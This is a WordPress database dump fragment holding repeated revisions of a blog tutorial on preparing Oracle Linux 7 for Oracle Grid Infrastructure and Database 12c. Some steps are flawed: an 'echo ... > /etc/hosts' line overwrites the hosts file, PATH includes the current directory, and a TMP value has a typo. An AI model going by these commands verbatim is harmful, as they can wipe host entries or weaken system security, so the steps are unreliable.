80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:42:02','2020-02-02 09:42:02','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(39,2,'2020-02-02 09:47:17','2020-02-02 09:47:17','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:47:17','2020-02-02 09:47:17','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(41,2,'2020-02-02 09:57:41','2020-02-02 09:57:41','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>now, you have to start oracleasm service and make it available on startup:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsystemctl enable oracleasm.service\nsystemctl start oracleasm.service\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to make asm disks from raw devices (example: /dev/sdb*) you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm createdisk DATA101 /dev/sdb1\n/usr/sbin/oracleasm createdisk DATA102 /dev/sdb2\n/usr/sbin/oracleasm createdisk DATA103 /dev/sdb3\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you run these commands:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm scandisks\n/usr/sbin/oracleasm listdisks\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and you have to config .bash_profile file of grid user:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /home/grid/.bash_profile\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and insert these records in it:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n# .bash_profile\n# Get the aliases and functions\nif [ -f ~/.bashrc ]; then\n . ~/.bashrc\nfi\n# User specific environment and startup programs\nexport ORACLE_BASE=/u01/crs/oracle\nexport ORACLE_HOME=/u01/crs/grid\nexport ORA_NLS33=$ORACLE_HOME/ocommon/nls/admin/data\nexport TNS_ADMIN=$ORACLE_HOME/network/admin\nexport ORACLE_DOC=$ORACLE_HOME/doc\nexport NLS_LANG=AMERICAN_AMERICA.AR8MSWIN1256\nexport TMPDIR=/tmp\nexport TMP=/tmp.\nexport TZ=Asia/Tehran\nexport ORACLE_SID=+ASM\nexport LD_LIBRARY_PATH=$ORACLE_HOME/lib:$ORACLE_HOME/gg\nexport ORACLE_UNQNAME=dbtest12\nexport ORACLE_HOSTNAME=S1VLDbCOraT01.enb.local\nexport PATH=$PATH:/bin:/usr/bin:/usr/local/bin/OPatch:$ORACLE_HOME/bin:/usr/bin/X11:/usr/local/bin:/usr/sbin::/sbin:.\nexport OWB_HOME=$ORACLE_HOME\nunset USERNAME\necho \".profile has been DONE successfully\"\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>finally, you should go to grid software location and start oracle universal installer:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ncd /u01/crs/grid\n./gridSetup.sh\n\n<!-- /wp:syntaxhighlighter/code --> ','Grid Infrastructure & Oracle Database 12c - Preinstallation tasks','','inherit','closed','closed','','27-revision-v1','','','2020-02-02 09:57:41','2020-02-02 09:57:41','',27,'http://ictbank.ir/blog/index.php/2020/02/02/27-revision-v1/',0,'revision','',0),
(42,2,'2020-02-02 09:58:50','2020-02-02 09:58:50','<p>To install Oracle Grid Infrastructure & Oracle Database on Oracle Linux 7, you need to prepare your OS. To do so, you have to follow these commands:</p>\n<p>First of all, you have to install required packages in the OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nyum install -y cloog-ppl libXxf86misc\nyum install -y compat-libcap1 libXxf86vm\nyum install -y compat-libstdc++-33 libaio-devel\nyum install -y cpp libdmx\nyum install -y gcc libstdc++-devel\nyum install -y gcc-c++ mpfr\nyum install -y glibc-devel make\nyum install -y glibc-headers ppl\nyum install -y kernel-headers xorg-x11-utils\nyum install -y libXmu xorg-x11-xauth\nyum install -y libXt libXv\nyum install -y ksh libXxf86dga\nyum install -y elfutils-libelf-devel\nyum install -y sysstat\nyum install -y smartmontools\nyum install -y nfs-utils\nyum install -y unzip\nyum install -y net-tools\nyum install -y kmod-oracleasm \nyum install -y oracleasm-support\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to edit /etc/hosts file and add the appropariate record as bellow:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\necho \"IP hostname hostname.domain\" > /etc/hosts\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>you may change <strong>IP, hostname and domain</strong> based on your enviroment.</p>\n<p>after that, you should calculate 3 parameters like this:</p>\n<ul>\n<li>SHMALL = TOTAL RAM IN BYTES / PAGE_SIZE</li>\n<li>SHMMAX = HALF OF TOTAL RAM IN BYTES\n</li>\n<li>SHMMNI = PAGE_SIZE\n</li>\n</ul>\n<p>to determine RAM size in bytes, you can use free command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nfree -b\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then you will edit /etc/sysctl.conf file and add these lines:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/sysctl.conf\n\nvm.swappiness = 0\nvm.dirty_background_ratio = 3\nvm.dirty_ratio = 80\nvm.dirty_expire_centisecs = 500\nvm.dirty_writeback_centisecs = 100\nkernel.shmmax = <strong>SHMMAX </strong>\nkernel.shmall = <strong>SHMALL </strong>\nkernel.shmmni = <strong>SHMMNI </strong>\nkernel.sem = 250 32000 100 128\nnet.ipv4.ip_local_port_range = 9000 65500\nnet.core.rmem_default = 262144\nnet.core.rmem_max = 4194304\nnet.core.wmem_default = 262144\nnet.core.wmem_max = 1048576\nfs.aio-max-nr = 1048576\nfs.file-max = 6815744\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and use this command to apply these changes:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nsysctl -p\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should add users and groups in OS:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\ngroupadd oinstall\ngroupadd dba\ngroupadd asmdba\ngroupadd asmoper\ngroupadd asmadmin\ngroupadd oper\nuseradd -g oinstall -G dba,oper,asmdba,asmoper oracle\nuseradd -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if oracle or grid users exist, we can use these command instead of useradd:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nusermod -g oinstall -G dba,oper,asmdba,asmoper oracle\nusermod -g oinstall -G dba,asmadmin,asmdba,asmoper grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>after that, you have to change password of these users:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\npasswd oracle\npasswd grid\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you should make directories for database and grid app and set permissions:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nmkdir /u01\nchown -R oracle:oinstall /u01 \nmkdir /u01/crs\nmkdir /u01/crs/grid\nchown -R grid:oinstall /u01/crs \nmkdir /u01/app\nchown -R oracle:oinstall /u01/app\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>if you downloaded sources from oracle web site, you can upload V840012-01.zip and V839960-01.zip to a directory (example: /source) and then extract then in their destinations:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nunzip /source/V840012-01.zip -d /u01/crs/grid\nunzip /source/V839960-01.zip -d /home/oracle\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>then, you have to install an rpm file:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nrpm -ivh /u01/crs/grid/cv/rpm/cvuqdisk-1.0.10-1.rpm\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>and edit /etc/security/limits.d/99-grid-oracle-limits.conf file and add records as below:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nvi /etc/security/limits.d/99-grid-oracle-limits.conf\n\noracle soft nproc 2047\noracle hard nproc 16384\noracle soft nofile 1024\noracle hard nofile 65536\noracle soft stack 10240\noracle hard stack 32768\ngrid soft nproc 2047\ngrid hard nproc 16384\ngrid soft nofile 1024\ngrid hard nofile 65536\ngrid soft stack 10240\ngrid hard stack 32768\n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>to apply these changes, you have to use this command:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\nulimit -a \n\n<!-- /wp:syntaxhighlighter/code -->\n\n<p>the next step is oracleasm configuration:</p>\n\n<!-- wp:syntaxhighlighter/code -->\n\n/usr/sbin/oracleasm configure -i\nConfiguring the Oracle ASM library driver.\n\nThis will configure the on-boot properties of the Oracle ASM library\ndriver. The following questions will determine whether the driver is\nloaded on boot and what permissions it will have. The current values\nwill be shown in brackets (\'[]\'). Hitting <ENTER> without typing an\nanswer will keep that current value. Ctrl-C will abort.\n\nDefault user to own the driver interface [grid]: <strong>grid</strong>\nDefault group to own the driver interface [asmadmin]: <strong>asmadmin</strong>\nStart Oracle ASM library driver on boot (y/n) [y]: <strong>y</strong>\nScan for Oracle ASM disks on boot (y/n) [y]: <strong>y</strong>\nWriting Oracle ASM library driver configuration: done\n\n<!-- 